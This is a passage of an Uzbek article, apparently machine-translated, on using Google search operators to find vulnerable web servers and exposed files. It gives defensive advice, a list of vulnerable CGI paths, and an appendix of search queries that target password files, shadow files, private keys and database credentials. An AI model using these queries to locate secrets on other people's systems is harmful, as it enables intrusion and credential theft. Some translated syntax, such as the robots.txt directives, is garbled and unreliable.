Bundan tashqari, ba'zilari OS O'rnatish vaqtida ular darhol WEB-serverni o'rnatadilar va ishga tushiradilar. Biroq, ba'zi foydalanuvchilar buni hatto bilishmaydi. Tabiiyki, agar kimdir standart sahifani olib tashlamaganligini ko'rsangiz, u holda kompyuter hech qanday sozlashdan o'tmagan va hujumga moyil bo'lishi mumkin deb taxmin qilish mantiqan to'g'ri keladi.

IIS 5.0 sahifalarini qidirib ko'ring

allintitle:Windows 2000 Internet xizmatlariga xush kelibsiz

IIS holatida siz nafaqat server versiyasini, balki uni ham aniqlashingiz mumkin Windows versiyasi va xizmat paketi.

WEB-server versiyasini aniqlashning yana bir yo'li sukut bo'yicha saytda o'rnatilishi mumkin bo'lgan qo'llanmalar (yordam sahifalari) va misollarni qidirishdir. Xakerlar saytga imtiyozli kirish uchun ushbu komponentlardan foydalanishning bir qancha usullarini topdilar. Shuning uchun siz ushbu komponentlarni ishlab chiqarish joyida olib tashlashingiz kerak. Ushbu komponentlarning mavjudligi server turi va uning versiyasi haqida ma'lumot olish uchun ishlatilishi mumkinligi haqida gapirmasa ham bo'ladi. Masalan, apache qo'llanmasini topamiz:

inurl: qo'lda apache ko'rsatmalari modullari

Google-dan CGI skaneri sifatida foydalanish.

CGI skaneri yoki WEB skaneri - bu jabrlanuvchi serverida zaif skriptlar va dasturlarni qidirish uchun yordamchi dastur. Ushbu yordam dasturlari nimani izlash kerakligini bilishi kerak, buning uchun ular zaif fayllarning to'liq ro'yxatiga ega, masalan:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Ushbu fayllarning har birini biz bilan topishimiz mumkin Google yordamida, qidiruv satrida fayl nomi bilan qo'shimcha ravishda index of yoki inurl so'zlarini ishlatib: biz zaif skriptlarga ega saytlarni topishimiz mumkin, masalan:

allinurl:/random_banner/index.cgi

Qo'shimcha bilimlardan foydalangan holda, xaker skriptning zaifligidan foydalanishi va bu zaiflikdan skriptni serverda saqlangan har qanday faylni chiqarishga majburlash uchun foydalanishi mumkin. Masalan, parol fayli.

O'zingizni Google xakeridan qanday himoya qilish kerak.

1. WEB-serverga muhim ma'lumotlarni joylashtirmang.

Agar siz ma'lumotlarni vaqtincha joylashtirgan bo'lsangiz ham, siz bu haqda unutishingiz mumkin yoki kimdir uni o'chirishdan oldin bu ma'lumotlarni topish va olishga vaqt topadi. Buni qilmang. Ma'lumotni o'g'irlikdan himoya qiladigan boshqa ko'plab boshqa usullar mavjud.

2. Saytingizni tekshiring.

Saytingizni tadqiq qilish uchun tavsiflangan usullardan foydalaning. http://johnny.ihackstuff.com saytida paydo bo'ladigan yangi usullar uchun vaqti-vaqti bilan saytingizni tekshiring. Harakatlaringizni avtomatlashtirishni istasangiz, Google’dan maxsus ruxsat olishingiz kerakligini unutmang. Agar diqqat bilan o'qisangiz http://www.google.com/terms_of_service.html, keyin siz quyidagi iborani ko'rasiz: Googlening oldindan ruxsatisiz Google tizimiga avtomatik so'rovlar yubora olmaysiz.

3. Saytingizni yoki uning bir qismini indekslash uchun sizga Google kerak emas.

Google sizga saytingizga havolani yoki uning bir qismini o'z ma'lumotlar bazasidan olib tashlash, shuningdek sahifalarni keshdan olib tashlash imkonini beradi. Bundan tashqari, siz saytingizdagi rasmlarni qidirishni taqiqlashingiz, sahifalarning qisqa qismlarini qidiruv natijalarida ko'rsatilishini taqiqlashingiz mumkin.Sahifada saytni o'chirishning barcha imkoniyatlari tasvirlangan. http://www.google.com/remove.html. Buning uchun siz haqiqatan ham ushbu saytning egasi ekanligingizni tasdiqlashingiz yoki sahifaga teglar kiritishingiz kerak yoki

4. robots.txt dan foydalaning

Ma'lumki, qidiruv tizimlari saytning ildizida joylashgan robots.txt fayliga qarashadi va so'z bilan belgilangan qismlarni indekslamaydi. Ruxsat bermaslik. Buni saytning bir qismi indekslanishini oldini olish uchun ishlatishingiz mumkin. Masalan, butun saytning indekslanishini oldini olish uchun ikkita qatordan iborat robots.txt faylini yarating:

Foydalanuvchi-agent: *
Ruxsat bermaslik: /

Yana nima bo'ladi

Hayot sizga asal kabi ko'rinmasligi uchun, nihoyat aytamanki, yuqorida ko'rsatilgan usullardan foydalanib, skriptlar va WEB-serverlardagi teshiklarni qidiradigan odamlarni kuzatadigan saytlar mavjud. Bunday sahifaga misol

Ilova.

Bir oz shirin. Quyidagilardan ba'zilarini o'zingiz uchun sinab ko'ring:

1. #mysql dump filetype:sql - ma'lumotlar bazasini qidirish mySQL ma'lumotlari
2. Xost zaifligi haqida xulosa hisoboti - sizga boshqa odamlar qanday zaifliklarni topganligini ko'rsatadi
3. phpMyAdmin inurl:main.php da ishlaydi - bu boshqaruvni phpmyadmin paneli orqali yopishga majbur qiladi.
4. maxfiy tarqatish uchun emas
5. Tafsilotlarni so'rovni boshqarish daraxti server o'zgaruvchilari
6. Child rejimida ishlash
7. Ushbu hisobot WebLog tomonidan yaratilgan
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – ehtimol kimdir xavfsizlik devori konfiguratsiya fayllariga muhtojdir? :)
10. intitle:indeks.of finances.xls – hmm....
11. intitle: dbconvert.exe chatlari indeksi – icq chat jurnallari
12.intext:Tobias Oetiker trafik tahlili
13. intitle: Webalizer tomonidan yaratilgan foydalanish statistikasi
14. intitle: ilg'or veb-statistika statistikasi
15. intitle:index.of ws_ftp.ini – ws ftp konfiguratsiyasi
16. inurl:ipsec.secrets umumiy sirlarni saqlaydi - maxfiy kalit - yaxshi topish
17. inurl:main.php phpMyAdmin ga xush kelibsiz
18. inurl:server-info Apache server ma'lumotlari
19. sayt:edu admin baholari
20. ORA-00921: SQL buyrug'ining kutilmagan tugashi – yo'llarni olish
21. sarlavha: trillian.ini indeksi
22. intitle: pwd.db indeksi
23.intitle:odamlar indeksi.lst
24. intitle: master.passwd indeksi
25.inurl:passlist.txt
26. intitle: .mysql_history indeksi
27. intitle:intext indeksi:globals.inc
28. intitle:administratorlar indeksi.pwd
29. intitle:Index.of etc soya
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:fayl turini bajarish:ini

  • "Google-ni buzish"
  • "Informzashchita" o'quv markazi http://www.itsecurity.ru - kadrlar tayyorlash sohasidagi etakchi ixtisoslashtirilgan markaz axborot xavfsizligi(Moskva ta'lim qo'mitasining 015470-sonli litsenziyasi, 004251-sonli davlat akkreditatsiyasi). Rossiya va MDH mamlakatlarida Internet xavfsizligi tizimlari va Clearwift bo'yicha yagona vakolatli o'quv markazi. Microsoft vakolatli o'quv markazi (Xavfsizlik mutaxassisligi). O'quv dasturlari Rossiya Davlat Texnik Komissiyasi, FSB (FAPSI) bilan kelishilgan. Ta'lim sertifikatlari va malaka oshirish to'g'risidagi davlat hujjatlari.

    SoftKey - bu xaridorlar, ishlab chiquvchilar, dilerlar va hamkorlar uchun noyob xizmatdir. Bundan tashqari, bu Rossiya, Ukraina, Qozog'istondagi eng yaxshi onlayn dasturiy ta'minot do'konlaridan biri bo'lib, u mijozlarga keng turdagi mahsulotlarni, ko'plab to'lov usullarini, tezkor (ko'pincha lahzali) buyurtmalarni qayta ishlashni, shaxsiy bo'limda buyurtma jarayonini kuzatishni, turli xil do'kon va ishlab chiqaruvchilardan chegirmalar BY.